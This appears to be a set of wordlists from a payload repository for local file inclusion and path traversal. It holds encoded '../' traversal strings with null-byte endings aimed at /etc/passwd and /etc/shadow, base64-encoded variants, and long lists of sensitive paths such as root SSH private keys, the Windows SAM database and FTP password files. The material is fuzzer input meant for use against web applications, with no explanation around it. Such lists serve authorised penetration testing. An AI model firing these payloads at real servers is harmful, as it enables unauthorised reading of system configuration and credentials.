/var/log/nginx/access_log
/var/log/nginx/access.log
../../../../../../../var/log/nginx/access_log
../../../../../../../var/log/nginx/access.log
../../../../../var/log/nginx/access_log
../../../../../var/log/nginx/access.log
/var/log/nginx/error_log
/var/log/nginx/error.log
../../../../../../../var/log/nginx/error_log
../../../../../../../var/log/nginx/error.log
../../../../../var/log/nginx/error_log
../../../../../var/log/nginx/error.log
/var/log/poplog
/var/log/POPlog
/var/log/proftpd
/var/log/proftpd.access_log
/var/log/proftpd.xferlog
/var/log/proftpd/xferlog.legacy
/var/log/pureftpd.log
/var/log/pure-ftpd/pure-ftpd.log
/var/log/qmail
/var/log/qmail/
/var/log/samba
/var/log/samba-log.%m
/var/log/secure
/var/log/smtpd
/var/log/spooler
/var/log/syslog
/var/log/telnetd
/var/log/thttpd_log
/var/log/utmp
/var/log/vsftpd.log
/var/log/wtmp
/var/log/xferlog
/var/log/yum.log
/var/lp/logs/lpNet
/var/lp/logs/lpsched
/var/lp/logs/requests
/var/mysql.log
/var/run/httpd.pid
/var/run/mysqld/mysqld.pid
/var/run/utmp
/var/saf/_log
/var/saf/port/log
/var/spool/errors
/var/spool/locks
/var/spool/logs
/var/spool/tmp
/var/www/conf/httpd.conf
/var/www/html/.htaccess
/var/www/localhost/htdocs/.htaccess
/var/www/log/access_log
/var/www/log/error_log
/../../var/www/logs/access_log
/var/www/logs/access_log
/var/www/logs/access.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../var/www/logs/access.log
/var/www/logs/error_log
/var/www/logs/error.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../var/www/logs/error_log
../../../../../var/www/logs/error.log
/var/www/sitename/htdocs/
/var/www/vhosts/sitename/httpdocs/.htaccess
/var/www/web1/html/.htaccess
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
/Volumes/webBackup/opt/apache2/conf/httpd.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
/web/conf/php.ini
/WINDOWS\php.ini
../../windows/win.ini
/WINNT\php.ini
/..\..\..\..\..\..\winnt\win.ini
/www/logs/proftpd.system.log
/xampp\apache\bin\php.ini
/.Xauthority
..2fapache2flogs2ferror.log
..2fapache2flogs2faccess.log
..2f..2fapache2flogs2ferror.log
..2f..2fapache2flogs2faccess.log
..2f..2f..2fapache2flogs2ferror.log
..2f..2f..2fapache2flogs2faccess.log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces_log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces.log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror_log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess.log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess_ log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess. log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror.log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror_l og
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror.l og
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror.log
..2fetc2fpasswd
..2fetc2fpasswd%00
..2f..2fetc2fpasswd
..2f..2fetc2fpasswd%00
..2f..2f..2fetc2fpasswd
..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fshadow%00
L2V0Yy9tYXN0ZXIucGFzc3dk
L21hc3Rlci5wYXNzd2Q=
ZXRjL3Bhc3N3ZA==
ZXRjL3NoYWRvdyUwMA==
L2V0Yy9wYXNzd2Q=
L2V0Yy9wYXNzd2QlMDA=
Li4vZXRjL3Bhc3N3ZA==
Li4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA==

39
File Inclusion/Intruders/LFI-FD-check.txt Normal file
View File

@ -0,0 +1,39 @@
/proc/self/cmdline
/proc/self/stat
/proc/self/status
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/self/fd/3
/proc/self/fd/4
/proc/self/fd/5
/proc/self/fd/6
/proc/self/fd/7
/proc/self/fd/8
/proc/self/fd/9
/proc/self/fd/10
/proc/self/fd/11
/proc/self/fd/12
/proc/self/fd/13
/proc/self/fd/14
/proc/self/fd/15
/proc/self/fd/16
/proc/self/fd/17
/proc/self/fd/18
/proc/self/fd/19
/proc/self/fd/20
/proc/self/fd/21
/proc/self/fd/22
/proc/self/fd/23
/proc/self/fd/24
/proc/self/fd/25
/proc/self/fd/26
/proc/self/fd/27
/proc/self/fd/28
/proc/self/fd/29
/proc/self/fd/30
/proc/self/fd/31
/proc/self/fd/32
/proc/self/fd/33
/proc/self/fd/34
/proc/self/fd/35

69
File Inclusion/Intruders/LFI-WindowsFileCheck.txt Normal file
View File

@ -0,0 +1,69 @@
php://input
C:\boot.ini
C:\WINDOWS\win.ini
C:\WINDOWS\php.ini
C:\WINDOWS\System32\Config\SAM
C:\WINNT\php.ini
C:\xampp\phpMyAdmin\config.inc
C:\xampp\phpMyAdmin\phpinfo.php
C:\xampp\phpmyadmin\config.inc
C:\xampp\phpmyadmin\phpinfo.php
C:\xampp\phpmyadmin\config.inc.php
C:\xampp\phpMyAdmin\config.inc.php
C:\xampp\apache\conf\httpd.conf
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\mercury.ini
C:\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\phpMyAdmin\config.inc.php
C:\xampp\tomcat\conf\tomcat-users.xml
C:\xampp\tomcat\conf\web.xml
C:\xampp\sendmail\sendmail.ini
C:\xampp\webalizer\webalizer.conf
C:\xampp\webdav\webdav.txt
C:\xampp\apache\logs\error.log
C:\xampp\apache\logs\access.log
C:\xampp\FileZillaFTP\Logs
C:\xampp\FileZillaFTP\Logs\error.log
C:\xampp\FileZillaFTP\Logs\access.log
C:\xampp\MercuryMail\LOGS\error.log
C:\xampp\MercuryMail\LOGS\access.log
C:\xampp\mysql\data\mysql.err
C:\xampp\sendmail\sendmail.log
C:\apache\log\error.log
C:\apache\log\access.log
C:\apache\log\error_log
C:\apache\log\access_log
C:\apache2\log\error.log
C:\apache2\log\access.log
C:\apache2\log\error_log
C:\apache2\log\access_log
C:\log\error.log
C:\log\access.log
C:\log\error_log
C:\log\access_log
C:\apache\logs\error.log
C:\apache\logs\access.log
C:\apache\logs\error_log
C:\apache\logs\access_log
C:\apache2\logs\error.log
C:\apache2\logs\access.log
C:\apache2\logs\error_log
C:\apache2\logs\access_log
C:\logs\error.log
C:\logs\access.log
C:\logs\error_log
C:\logs\access_log
C:\log\httpd\access_log
C:\log\httpd\error_log
C:\logs\httpd\access_log
C:\logs\httpd\error_log
C:\opt\xampp\logs\access_log
C:\opt\xampp\logs\error_log
C:\opt\xampp\logs\access.log
C:\opt\xampp\logs\error.log
C:\Program Files\Apache Group\Apache\logs\access.log
C:\Program Files\Apache Group\Apache\logs\error.log
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Program Files\xampp\apache\conf\httpd.conf

62
File Inclusion/Intruders/Linux-files.txt Normal file
View File

@ -0,0 +1,62 @@
/etc/passwd
/etc/group
/etc/hosts
/etc/motd
/etc/issue
/etc/bashrc
/etc/apache2/apache2.conf
/etc/apache2/ports.conf
/etc/apache2/sites-available/default
/etc/httpd/conf/httpd.conf
/etc/httpd/conf.d
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/etc/init.d/apache2
/etc/mysql/my.cnf
/etc/nginx.conf
/opt/lampp/logs/access_log
/opt/lampp/logs/error_log
/opt/lamp/log/access_log
/opt/lamp/logs/error_log
/proc/self/environ
/proc/version
/proc/cmdline
/proc/mounts
/proc/config.gz
/root/.bashrc
/root/.bash_history
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.ssh/id_rsa.keystore
/root/.ssh/id_rsa.pub
/root/.ssh/known_hosts
/usr/local/apache/htdocs/index.html
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/extra/httpd-ssl.conf
/usr/local/apache/logs/error_log
/usr/local/apache/logs/access_log
/usr/local/apache/bin/apachectl
/usr/local/apache2/htdocs/index.html
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/extra/httpd-ssl.conf
/usr/local/apache2/logs/error_log
/usr/local/apache2/logs/access_log
/usr/local/apache2/bin/apachectl
/usr/local/etc/nginx/nginx.conf
/usr/local/nginx/conf/nginx.conf
/var/apache/logs/access_log
/var/apache/logs/access.log
/var/apache/logs/error_log
/var/apache/logs/error.log
/var/log/apache/access.log
/var/log/apache/access_log
/var/log/apache/error.log
/var/log/apache/error_log
/var/log/httpd/error_log
/var/log/httpd/access_log
/var/log/nginx/access_log
/var/log/nginx/access.log
/var/log/nginx/error_log
/var/log/nginx/error.log

911
File Inclusion/Intruders/List_Of_File_To_Include.txt Normal file
View File

@ -0,0 +1,911 @@
\apache2\log\access_log
\apache2\log\access.log
\apache2\log\error_log
\apache2\log\error.log
/apache2/logs/access.log
/apache2/logs/access.log
\apache2\logs\access_log
\apache2\logs\access.log
/apache2/logs/access.log%00
/apache2/logs/error.log
/apache2/logs/error.log
\apache2\logs\error_log
\apache2\logs\error.log
/apache2/logs/error.log%00
\apache\log\access_log
\apache\log\access.log
\apache\log\error_log
\apache\log\error.log
/apache/logs/access.log
/apache/logs/access.log
/apache/logs/access.log
\apache\logs\access_log
\apache\logs\access.log
/apache/logs/access.log%00
/apache/logs/error.log
/apache/logs/error.log
/apache/logs/error.log
\apache\logs\error_log
\apache\logs\error.log
/apache/logs/error.log%00
/apache\php\php.ini
/apache\php\php.ini
/apache\php\php.ini%00
/bin/php.ini
/bin/php.ini
/bin/php.ini%00
c:\apache\php\php.ini
C:\apache\php\php.ini
C:\boot.ini
c:\home2\bin\stable\apache\php.ini
C:\home2\bin\stable\apache\php.ini
c:\home\bin\stable\apache\php.ini
C:\home\bin\stable\apache\php.ini
C:\MySQL\data\hostname.err
C:\MySQL\data\mysql-bin.log
C:\MySQL\data\mysql.err
C:\MySQL\data\mysql.log
C:\MySQL\my.cnf
C:\MySQL\my.ini
c:\NetServer\bin\stable\apache\php.ini
c:\php4\php.ini
C:\php4\php.ini
C:\php4\sessions\
c:\php5\php.ini
C:\php5\php.ini
C:\php5\sessions\
c:\php\php.ini
c:\PHP\php.ini
C:\php\php.ini
C:\php\sessions\
C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf
C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf
C:\ProgramFiles\ApacheGroup\Apache\logs\access.log
C:\ProgramFiles\ApacheGroup\Apache\logs\error.log
C:\ProgramFiles\MySQL\data\hostname.err
C:\ProgramFiles\MySQL\data\mysql-bin.log
C:\ProgramFiles\MySQL\data\mysql.err
C:\ProgramFiles\MySQL\data\mysql.log
C:\ProgramFiles\MySQL\my.cnf
C:\ProgramFiles\MySQL\my.ini
C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err
C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log
C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err
C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log
C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf
C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini
C:\ProgramFiles\xampp\apache\conf\httpd.conf
c:\WINDOWS\php.ini
C:\WINDOWS\php.ini
C:\WINDOWS\Repair\SAM
C:\WINDOWS\TEMP\
C:\WINDOWS\win.ini
c:\WINNT\php.ini
C:\WINNT\php.ini
C:\WINNT\win.ini
c:\xampp\apache\bin\php.ini
C:\xampp\apache\bin\php.ini
etc%2fpasswd
etc%2fpasswd%00
etc%5cpasswd
etc%5cpasswd%00
/etc/apache2/apache2.conf
/etc/apache2.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/conf/httpd.conf%00
/etc/apache2/httpd.conf
/etc/apache2/httpd.conf
/etc/apache2/httpd.conf%00
/etc/apache2/sites-available/default
/etc/apache2/sites-enabled/000-default
/etc/apache/apache.conf
/etc/apache/conf/httpd.conf
/etc/apache/conf/httpd.conf
/etc/apache/conf/httpd.conf%00
/etc/apache/httpd.conf
etc%c0%afpasswd
etc%c0%afpasswd%00
/etc/chrootUsers
/etc/chrootUsers
/etc/chrootUsers%00
/etc/crontab
/etc/fstab
/etc/ftpchroot
/etc/ftpchroot
/etc/ftpchroot%00
/etc/ftphosts
/etc/ftphosts
/etc/ftphosts%00
/etc/group
/etc/group
/etc/group%00
/etc/hosts
/etc/http/conf/httpd.conf
/etc/http/conf/httpd.conf
/etc/http/conf/httpd.conf%00
/etc/httpd.conf
/etc/httpd.conf
/etc/httpd.conf%00
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/conf/httpd.conf%00
/etc/httpd/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/httpd.conf%00
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/acces.log
/etc/httpd/logs/acces_log%00
/etc/httpd/logs/acces.log%00
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error_log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log%00
/etc/httpd/logs/error.log%00
/etc/httpd/php.ini
/etc/httpd/php.ini
/etc/httpd/php.ini%00
/etc/http/httpd.conf
/etc/http/httpd.conf
/etc/http/httpd.conf%00
/etc/inittab
/etc/issue
/etc/issue
/etc/logrotate.d/ftp
/etc/logrotate.d/ftp
/etc/logrotate.d/ftp%00
/etc/logrotate.d/proftpd
/etc/logrotate.d/proftpd
/etc/logrotate.d/proftpd%00
/etc/logrotate.d/vsftpd.log
/etc/logrotate.d/vsftpd.log
/etc/logrotate.d/vsftpd.log%00
/etc/master.passwd
/etc/motd
/etc/motd
/etc/my.cnf
/etc/my.cnf
/etc/my.cnf%00
/etc/mysql/my.cnf
/etc/mysql/my.cnf
/etc/mysql/my.cnf%00
/etc/nginx.conf
/etc/nginx/nginx.conf
/etc/nginx/sites-available/default
/etc/nginx/sites-enabled/default
/etc/pam.d/proftpd
/..\..\\..\..\\..\..\\..\..\\\/etc/passwd
/etc/passwd
/etc/passwd
/etc/passwd%00
etc/passwd%00
/etc/php4.4/fcgi/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4.4/fcgi/php.ini%00
/etc/php4/apache2/php.ini
/etc/php4/apache2/php.ini
/etc/php4/apache2/php.ini%00
/etc/php4/apache/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache/php.ini%00
/etc/php4/cgi/php.ini
/etc/php4/cgi/php.ini
/etc/php4/cgi/php.ini%00
/etc/php5/apache2/php.ini
/etc/php5/apache2/php.ini
/etc/php5/apache2/php.ini%00
/etc/php5/apache/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache/php.ini%00
/etc/php5/cgi/php.ini
/etc/php5/cgi/php.ini
/etc/php5/cgi/php.ini%00
/etc/php/apache2/php.ini
/etc/php/apache2/php.ini
/etc/php/apache2/php.ini%00
/etc/php/apache/php.ini
/etc/php/apache/php.ini
/etc/php/apache/php.ini%00
/etc/php/cgi/php.ini
/etc/php/cgi/php.ini
/etc/php/cgi/php.ini%00
/etc/php.ini
/etc/php.ini
/etc/php.ini%00
/etc/phpmyadmin/config.inc.php
/etc/php/php4/php.ini
/etc/php/php4/php.ini
/etc/php/php4/php.ini%00
/etc/php/php.ini
/etc/php/php.ini
/etc/php/php.ini%00
/etc/proftp.conf
/etc/proftp.conf
/etc/proftp.conf%00
/etc/proftpd/modules.conf
/etc/proftpd/modules.conf
/etc/proftpd/modules.conf%00
/etc/protpd/proftpd.conf
/etc/protpd/proftpd.conf
/etc/protpd/proftpd.conf%00
/etc/pure-ftpd.conf
/etc/pure-ftpd.conf
/etc/pure-ftpd.conf%00
/etc/pureftpd.passwd
/etc/pureftpd.passwd
/etc/pureftpd.passwd%00
/etc/pureftpd.pdb
/etc/pureftpd.pdb
/etc/pureftpd.pdb%00
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.conf%00
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/pureftpd.pdb
/etc/pure-ftpd/pureftpd.pdb
/etc/pure-ftpd/pure-ftpd.pdb%00
/etc/pure-ftpd/pureftpd.pdb%00
/etc/redhat-release
/etc/release
/etc/security/environ
/etc/security/environ
/etc/security/environ%00
/etc/security/group
/etc/security/group
/etc/security/group%00
/etc/security/limits
/etc/security/limits
/etc/security/limits%00
/etc/security/passwd
/etc/security/passwd
/etc/security/passwd%00
/etc/security/user
/etc/security/user
/etc/security/user%00
/etc/shadow
/etc/shadow~
/etc/shadow
/etc/shadow%00
/etc/ssh/sshd_config
/etc/sysconfig/network-scripts/ifcfg-eth0
/etc/vhcs2/proftpd/proftpd.conf
/etc/vhcs2/proftpd/proftpd.conf
/etc/vhcs2/proftpd/proftpd.conf%00
/etc/vsftpd.chroot_list
/etc/vsftpd.chroot_list
/etc/vsftpd.chroot_list%00
/etc/vsftpd.conf
/etc/vsftpd.conf
/etc/vsftpd.conf%00
/etc/vsftpd/vsftpd.conf
/etc/vsftpd/vsftpd.conf
/etc/vsftpd/vsftpd.conf%00
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftpaccess%00
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftphosts%00
/etc/wu-ftpd/ftpusers
/etc/wu-ftpd/ftpusers
/etc/wu-ftpd/ftpusers%00
/home2\bin\stable\apache\php.ini
/home2\bin\stable\apache\php.ini
/home2\bin\stable\apache\php.ini%00
/home\bin\stable\apache\php.ini
/home\bin\stable\apache\php.ini
/home\bin\stable\apache\php.ini%00
\log\access_log
\log\access.log
\log\error_log
\log\error.log
\log\httpd\access_log
\log\httpd\error_log
/logs/access_log
/logs/access_log
/logs/access.log
/logs/access.log
\logs\access_log
\logs\access.log
/logs/access.log%00
/logs/error_log
/logs/error_log
/logs/error.log
/logs/error.log
\logs\error_log
\logs\error.log
/logs/error.log%00
\logs\httpd\access_log
\logs\httpd\error_log
/logs/pure-ftpd.log
/logs/pure-ftpd.log
